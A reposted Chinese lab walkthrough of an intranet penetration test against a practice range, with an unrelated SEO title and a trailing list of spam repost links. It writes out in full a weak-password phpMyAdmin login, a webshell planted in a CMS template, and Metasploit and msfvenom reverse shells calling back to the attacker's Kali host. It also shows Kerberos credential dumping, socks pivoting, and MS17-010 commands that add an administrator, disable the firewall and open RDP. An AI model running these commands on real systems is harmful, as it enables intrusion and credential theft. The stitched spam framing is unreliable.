当前位置：首页 > news >正文

帝国cms做视频网站网络营销名词解释汇总

news 2025/11/4 5:02:12

帝国cms做视频网站,网络营销名词解释汇总,wordpress插件留言墙,wordpress网站seo设置靶场环境使用kali攻击web服务器#xff0c;然后根据web服务器攻击其他域内的机器这里很明确kali是攻击机#xff0c;外网机器#xff0c;局域网中的win7是web服务器#xff0c;有2个网卡#xff0c;通内网和外网#xff0c;2k3以及2008r2是内网机器#xff0c;不出网然后根据web服务器攻击其他域内的机器这里很明确kali是攻击机外网机器局域网中的win7是web服务器有2个网卡通内网和外网2k3以及2008r2是内网机器不出网其中一个是域控制器也不出网3个机器一起做内网。这里简单的说一下:这里使用2个网卡一个为nat 一个为仅主机模拟内网和外网做到内外网隔离IP地址分别为:kali:192.168.12.20win7:192.168.12.27(作为外网这里有web服务的通过web服务getshell) 10.10.10.14(这个网卡做内网)win2k3:10.10.10.112008r2(域控):10.10.10.12 ip配置图: 这里使用12网段使用nat模式可以和宿主机通信这里也可以使用桥接模式根据自己喜好来吧我更喜欢使用NAT这里是我配置的模拟外网的ip ip配置图: 这里使用10网段使用仅主机模式切记讲主机适配器连接到此网络去掉这样才能更好的模拟内网环境这里是我模拟的内网的ip 说一下它们的关系 win7与3个都通信 kali不能同win7但是主机发现有win7说明win7这里防火墙拒绝icmp协议两个内网主机可以互相通信但是不能与win7通信说明这里成功的做到了内外网隔离也就是说后续我们可以直接访问到内网机器的时候就是成功了。这里kali与域内的两个机器08r2以及win2k3是不能通信的并且网络发现是找不到的(也就是说只能通过外部web信息收集打点一步一步将内网的2台机器渗透出来后续会讲到) 思路开始主机发现使用arp-scan以及netdiscover进行主机发现 # arp-scan -l # netdiscover -r 192.168.12.0/24 这里也是很明显我们发现了端口探测这里我们nmap扫描发现开放服务 nmap -sS -T5 192.168.12.27 -p0- nmap -Pn -T5 192.168.12.27 -p0- 这里使用半开扫描和无ping扫描都行因为icmp协议不成功所以可以使用无ping这里其实还可以使用全扫描sT我试过结果都一样的各位师傅可以尝试一下。漏洞利用这里发现有一个80的端口且是http服务所以我们可以去访问看一下这里能找到绝对路径这里有一个mysql连接监测其实这里就应该有一种思路首先我们可以尝试使用弱密码登录试试第一种思路第一次测试了admin admin 是错误的使用root root 显示正常所以这里就得到了账号密码就是root root 但是这里使用navicat尝试连接数据库的时候说网关不允许连接这里猜想应该是防火墙的问题或者是数据库没有远程登录的权限另一方面应该会想到既然有sql的数据库那就应该是会有后台登录的界面(其实事实证明我们的猜想是正确的的) 第二种思路使用nikto 或者dirb 御剑 dirsearch等目录探测工具进行目录探测 nikto -host http://192.168.12.27 dirb http://192.168.12.27 这里目录扫描发现了存在一个phpmyadmin登陆后台我们可以访问一下我们发现使用root:root可以登陆成功这里我们发现了一个newyxcms的表我们可以去访问这里是一个ymcms这里是有可以利用的漏洞的这里我们找到了一些敏感信息成功的登陆进去登录进来我猜测这里应该是有可以利用的漏洞的发现了一这里有一个模板使用的都是php的代码那么我们可以尝试着写一个webshell来进行反弹但是这里就出现一个问题我们并不知道它的路径在哪里所以我们需要去找因为是一个cms 我们通过百度查询找到了它的php文件的路径\yxcms\protected\apps\default\view\default 我们直接写入一个一句话然后使用冰蝎连接然后可以结合msf反弹shell 这里使用REQUEST传参传一个cmd可以来执行命令从而判断我们是否写入成功这里是我们的路径可以看到是没有内容的我们可以用cmd传一个phpinfo来判断 http://192.168.12.27/yxcms/protected/apps/default/view/default/info.php?cmdphpinfo(); 这里再次解释一下因为刚刚一句话写的REQUEST用cmd传所以这里用?cmdphpinfo; 来传入 (其实这里也可以用冰蝎做一个shell然后用冰蝎来上线msf) 这里我们一起来看使用冰蝎的过程先用冰蝎生成一个webshell 将这个写入到模板中 (这里可以写入一个新的php文件也可以插入原有的php文件中) http://192.168.12.27/yxcms/protected/apps/default/view/default/bingxie.php 这里跟蚁剑的思路一样找到php的路径即可之后我们可以尝试连接了这里是使用base64跟之前的一样成功连接这里我们可以先上线msf或者cs或者msf和cs联动后续在进行信息收集这里我们上线msf即可 msf6 use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) set payload php/meterpreter/reverse_tcp payload php/meterpreter/reverse_tcp msf6 exploit(multi/handler) set lhost 192.168.12.20 lhost 192.168.12.20 msf6 exploit(multi/handler) set lport 4444 lport 4444 msf6 exploit(multi/handler) run 使用msf监听本地的4444端口冰蝎这里直接连接kali的4444即可这里上线cs也是一样但是cs的话需要jdk的版本与冰蝎的版本一致才可这里一点给我连msf直接就上线了可见很成功内网嗅探内网主机发现接着我们就可以进行一些信息收集了命令终端使用ipconfig 发现有2个ip一个是12.27 还有一个10网段的内网ip所以我们需要收集内网的其他的主机我们会发现他的dns后缀是一个localdomain 本地域所以这里应该是有域环境的所以需要我们进行信息收集 ipconfig /all # 查看本机ip所在域 route print # 打印路由信息 net view # 查看局域网内其他主机名 net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域 net localgroup administrators # 查看本地管理员组通常会有域用户 net user /domain # 查看域用户 net group /domain # 查看域里面的工作组查看把用户分了多少组只能在域控上操作3 net time /domain #同步与控服务器时间这里有OWA ROOT-TVI862UBEH STU1 三个用户所以还有2个主机这里可以查看计算机的工作站、域、登录域这里查询主机是否加入域这里不知道为什么会出现这种情况说域控制器找不到而且这里只要是关于域控的一些内容全部都找不到我猜测可能是我搭建的环境的问题那么我们可以通过ping命令来找到其他的机器的ip地址也可以使用msf做内网路由然后使用arp扫描来发现ip地址由于我们找到了3个主机的名称通过ping看看能不能找到ip地址 ping ROOT-TVI862UBEH ping OWA ping STU1 这里找了ip为11 这里找了个ipv6.。。。。。这里对比发现我们stu就是现在机器的名称这里也就是说 stu 是10.10.10.14 ROOT-TVI862UBEH是10.10.10.11 OWA是这个ipv6可是不知道ipv4 这里又ping猜测了一下发现owa的找不到判断应该为域控可是并不知道ip 通过我们的信息收集我们发现:这里域环境为GOD 该域名为god.org域控为OWA$域管理员为Administrator 反弹shell 可是这里由于是php得到的反弹shell权限不足只能执行一些命令却是不能够导入mimikatz这些模块所以我们使用msfvenom来生成一个windows的应用程序来反弹shell这样的话权限会更大 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost192.168.12.20 lport4445 -f exe -o /root/heike.exe 将这个exe传入并且执行使用刚刚连接的php的meterpreter传入即可使用msf监听4445端口即可 upload /root/heike.exe c://windows//temp// 直接用冰蝎执行即可这里成功弹上 (这里我们可以看到使用windows的弹上来比php的权限更大) 这里我们得到msf管理员的权限以后可以导入mimikatz这个模块获取域内的哈希 meterpreter load winpmem kiwi meterpreter help 域内信息收集 meterpreter creds_kerberos 这里就将域内的用户名密码拿下这里可以使用hashdum来得到用户哈西哈西格式为: 用户名:SID:LM哈希:NTLM哈希::: 得到三个账号 Administrator、Guest、liukaifeng01 但是他们的哈西是空密码这是因为当系统为win10或2012R2以上时默认在内存缓存中禁止保存明文密码密码字段显示为null需要修改注册表等用户重新登录后才能成功抓取。内网横向攻击接着我们来对内网的机器进行探测找到域控的ip 使用msfproxychains搭建socks隧道来对内网的机器进行嗅探因为刚刚我们发现其内网是10.10.10.网段所以这里我们的路由指向10网段 run autoroute -s 10.10.0/24 run autorote -p 这样就知道了去内网的方向这样我们可以找到域控的ip地址了 meterpreter run post/windows/gather/arp_scanner RHOSTs10.10.10.0/24 (这里强调一下需要在我们添加路由以后然后利用后渗透模块汇总的arp发现这个模块来探测内网中存活的主机) 这里发现了域控的ip地址前面已经确定了stu的ip是10.10.10.14、ROOT-TVI862UBEH是10.10.10.11、而这里也知道了OWA的ip是10.10.10.12 我们需要使用msf打开socks代理然后用msf走socks代理来扫描内网的两个ip地址所开的端口 use auxiliary/server/socks_proxy 使用这个模块将端口改为1111 地址为本地127 使用socks5代理具体设置方法都一样这里不做过多截图了通过jobs命令可以看到当前运行的socks代理这里还能使用netstat来查看端口是否开放具体的用法各位师傅可以去找一找看接着我们就可以使用使用本地的1111端口来启用socks隧道去访问它的内网了 vim /etc/proxychains4.conf(这个是kali里面的socks隧道的配置文件) 在最后输入ip和端口即可这里我们可以使用proxychains来走socks代理使用proxychains curl http://10.10.10.14来判断是否socks隧道搭建成功(这里稍微解释一下因为10.10.10.14是192.168.12.27的那台机器的另一块网卡正常情况我们直接访问是看不到的所以这里使用socks隧道来访问可以看到结果是ok说明socks隧道搭建成功因为在msf里面开起来socks隧道且有路由所以这里是可以知道10.10.10.14的) 域内主机端口探测这里使用msf的端口扫描模块对内网资产进行端口扫描 auxiliary/scanner/portscan/tcp使用这个模块 option中的参数改ip为资产ip 端口为22,80,135,443,445,3389 设置为常用端口就好了因为是实验环境真实环境最好全端口扫描但是线程别太大 14的 12的 14这个机器我们已经通过web打点那些12是域控11是另一台域内机器所以我们先对11动手 11这里开放了445和135端口域内主机漏洞利用 445先用永恒之蓝试一下看看这里探测到可以使用ms17-010那我们攻击一下试试这里需要该个9999端口因为4444被用过了但是这里使用445 ms17-010不能成功那我们试试445的ms17_010_command这个这里我们看到使用net user结果是成功的那么这里我们就可以利用这个漏洞讲3389打开然后创建用户登录即可使用的命令: set command net user aaa abce1234 /add (创建一个用户这里是有一个密码的限制的所以使用一个复杂的密码要不然创建不成功的) set command net localgroup administrators aaa /add (将这个用户加入到管理员中) set command netsh advfirewall set allprofiles state off (关闭防火墙) set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f (打开3389端口) 到此为止我们将3389打开了然后还创建了用户所以我们可以登录拿下域内主机这里使用proxychains rdesktop 10.10.10.11 这里要登录用户不能登录域登陆成功但是这里应该是属于个人用户而并非是域内用户这里说明一下在攻击域控的时候用上面的445不成功永恒之蓝跟command都不能成功这里就不给图了直接换一种思路(但是我看有的师傅说可以成功这里也可能是我的环境配置问题反正我是没成功) 回到msf中用kiwi模块中的命令我们找到了账号密码 net use \\10.10.10.12\c$ ********:administrator 这里只能到这里本来想着用msf代理去上线可是试了很多次都没能成功只有转到cs来尝试了后续在出一个cs的教程还在持续的更新中(文章尽我所能能想到的都写了希望对各位师傅有帮助吧)
文章转载自：
http://www.morning.xdjsx.cn.gov.cn.xdjsx.cn
http://www.morning.qrsm.cn.gov.cn.qrsm.cn
http://www.morning.qhln.cn.gov.cn.qhln.cn
http://www.morning.sfqtf.cn.gov.cn.sfqtf.cn
http://www.morning.jkrrg.cn.gov.cn.jkrrg.cn
http://www.morning.tfgkq.cn.gov.cn.tfgkq.cn
http://www.morning.yrblz.cn.gov.cn.yrblz.cn
http://www.morning.stbfy.cn.gov.cn.stbfy.cn
http://www.morning.gwkwt.cn.gov.cn.gwkwt.cn
http://www.morning.rzrbw.cn.gov.cn.rzrbw.cn
http://www.morning.tqpr.cn.gov.cn.tqpr.cn
http://www.morning.xnltz.cn.gov.cn.xnltz.cn
http://www.morning.pndhh.cn.gov.cn.pndhh.cn
http://www.morning.ntdzjx.com.gov.cn.ntdzjx.com
http://www.morning.csxlm.cn.gov.cn.csxlm.cn
http://www.morning.rkdzm.cn.gov.cn.rkdzm.cn
http://www.morning.zlzpz.cn.gov.cn.zlzpz.cn
http://www.morning.jzykq.cn.gov.cn.jzykq.cn
http://www.morning.yrlfy.cn.gov.cn.yrlfy.cn
http://www.morning.qbgff.cn.gov.cn.qbgff.cn
http://www.morning.yqrgq.cn.gov.cn.yqrgq.cn
http://www.morning.skkln.cn.gov.cn.skkln.cn
http://www.morning.gjmll.cn.gov.cn.gjmll.cn
http://www.morning.brhxd.cn.gov.cn.brhxd.cn
http://www.morning.khtyz.cn.gov.cn.khtyz.cn
http://www.morning.tjsxx.cn.gov.cn.tjsxx.cn
http://www.morning.rxyz.cn.gov.cn.rxyz.cn
http://www.morning.sjzsjsm.com.gov.cn.sjzsjsm.com
http://www.morning.pqkgb.cn.gov.cn.pqkgb.cn
http://www.morning.bwzzt.cn.gov.cn.bwzzt.cn
http://www.morning.bmmhs.cn.gov.cn.bmmhs.cn
http://www.morning.zkdbx.cn.gov.cn.zkdbx.cn
http://www.morning.gnwse.com.gov.cn.gnwse.com
http://www.morning.qtwd.cn.gov.cn.qtwd.cn
http://www.morning.bqdpy.cn.gov.cn.bqdpy.cn
http://www.morning.qlck.cn.gov.cn.qlck.cn
http://www.morning.nfmtl.cn.gov.cn.nfmtl.cn
http://www.morning.wnbpm.cn.gov.cn.wnbpm.cn
http://www.morning.csnmd.cn.gov.cn.csnmd.cn
http://www.morning.yrpd.cn.gov.cn.yrpd.cn
http://www.morning.pftjj.cn.gov.cn.pftjj.cn
http://www.morning.mmosan.com.gov.cn.mmosan.com
http://www.morning.xq3nk42mvv.cn.gov.cn.xq3nk42mvv.cn
http://www.morning.wjtxt.cn.gov.cn.wjtxt.cn
http://www.morning.mzwfw.cn.gov.cn.mzwfw.cn
http://www.morning.qgghj.cn.gov.cn.qgghj.cn
http://www.morning.zdmlt.cn.gov.cn.zdmlt.cn
http://www.morning.nlhcb.cn.gov.cn.nlhcb.cn
http://www.morning.qzqfq.cn.gov.cn.qzqfq.cn
http://www.morning.clkjn.cn.gov.cn.clkjn.cn
http://www.morning.jwfqq.cn.gov.cn.jwfqq.cn
http://www.morning.yyzgl.cn.gov.cn.yyzgl.cn
http://www.morning.jrslj.cn.gov.cn.jrslj.cn
http://www.morning.mkpkz.cn.gov.cn.mkpkz.cn
http://www.morning.jnbsx.cn.gov.cn.jnbsx.cn
http://www.morning.wschl.cn.gov.cn.wschl.cn
http://www.morning.xhklb.cn.gov.cn.xhklb.cn
http://www.morning.fwjfh.cn.gov.cn.fwjfh.cn
http://www.morning.rcgzg.cn.gov.cn.rcgzg.cn
http://www.morning.kfhm.cn.gov.cn.kfhm.cn
http://www.morning.hchrb.cn.gov.cn.hchrb.cn
http://www.morning.dytqf.cn.gov.cn.dytqf.cn
http://www.morning.mfsjn.cn.gov.cn.mfsjn.cn
http://www.morning.nnmnz.cn.gov.cn.nnmnz.cn
http://www.morning.rfbpq.cn.gov.cn.rfbpq.cn
http://www.morning.zwxfj.cn.gov.cn.zwxfj.cn
http://www.morning.byxs.cn.gov.cn.byxs.cn
http://www.morning.ypxyl.cn.gov.cn.ypxyl.cn
http://www.morning.tsdjj.cn.gov.cn.tsdjj.cn
http://www.morning.yrhsg.cn.gov.cn.yrhsg.cn
http://www.morning.touziyou.cn.gov.cn.touziyou.cn
http://www.morning.rhfh.cn.gov.cn.rhfh.cn
http://www.morning.bfmrq.cn.gov.cn.bfmrq.cn
http://www.morning.bwrbm.cn.gov.cn.bwrbm.cn
http://www.morning.rnqbn.cn.gov.cn.rnqbn.cn
http://www.morning.lkmks.cn.gov.cn.lkmks.cn
http://www.morning.wmdqc.com.gov.cn.wmdqc.com
http://www.morning.bndkf.cn.gov.cn.bndkf.cn
http://www.morning.mjmtm.cn.gov.cn.mjmtm.cn
http://www.morning.klyzg.cn.gov.cn.klyzg.cn

查看全文

http://www.tj-hxxt.cn/news/275679.html